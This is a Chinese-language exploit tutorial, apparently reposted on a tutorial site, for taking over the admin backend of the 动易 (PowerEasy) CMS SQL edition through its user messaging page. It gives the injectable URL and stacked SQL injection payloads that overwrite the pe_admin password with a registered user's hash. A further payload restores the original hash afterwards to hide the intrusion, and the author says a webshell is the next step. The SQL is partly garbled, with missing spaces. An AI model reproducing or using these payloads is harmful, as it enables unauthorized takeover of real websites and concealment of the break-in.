动易SQL版新洞利用短信功能直接拿后台_漏洞研究教程-查字典教程网
动易SQL版新洞利用短信功能直接拿后台
动易SQL版新洞利用短信功能直接拿后台
发布时间:2016-12-26 来源:查字典编辑
摘要:先注册个号,进入控制面版给自己发条短信http://127.0.0.1/User/User_Message.asp?Action=Del&M...

先注册个号,进入控制面版给自己发条短信

http://127.0.0.1/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=4

这就是点```

用户名为admin奇怪``抓不到```好了抓到了~~~显示记录不存在``是因为

=没有登陆````ef0020cf8c5e45b9密码是这个```

下面就开始将管理员的密码更新为我注册用户的密码````

利用动易爆库改库程序先将pe_admin里adminname,password字段爆出来.....

);updatepe_adminsetpassword=(selectuserpasswordfrompe_user

whereusername=char(0x68)%2Bchar(0x61)%2Bchar(0x63)%2Bchar(0x6b)

%2Bchar(0x35)%2Bchar(0x32)%2Bchar(0x30))whereid=1;--

这语句的意思就是将PE——ADMIN表中ID=1的用户的密码更新为PE_USER表中user的密码```好``现在来看```需要将hack520转char

更新成功`~~~~现在已经将PE_admin表ID=1的用户的密码更新为hack520的密码````再看一下```

53dc3b60f2d40cd4这个是我前面注册的密码```好现在登陆后台看看

您的用户名:admin

您的身份:超级管理员

待阅短信:1条

成功````然后为自己加个管理员`然后利用以下语句`将管理员的密码更新回来

user

就是注册的用户名````````时间不多```进得了后台就不管其他的先了````拿WEBSHELL以后再说```

刚刚时间到了,现在继续。。。将管理员密码改回来.

);declare@asysnameselect@a=0x650066003000300032003000630066

0038006300350065003400350062003900updatepe_adminsetpasswo

rd=@a--这个要转一下

更新```把管理员密码改回来OK我们再看看修改成功没```ef0020cf8c5e45b9这个是原来的密码吧?

好了就到此结束!

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新漏洞研究学习
    热门漏洞研究学习
    实用技巧子分类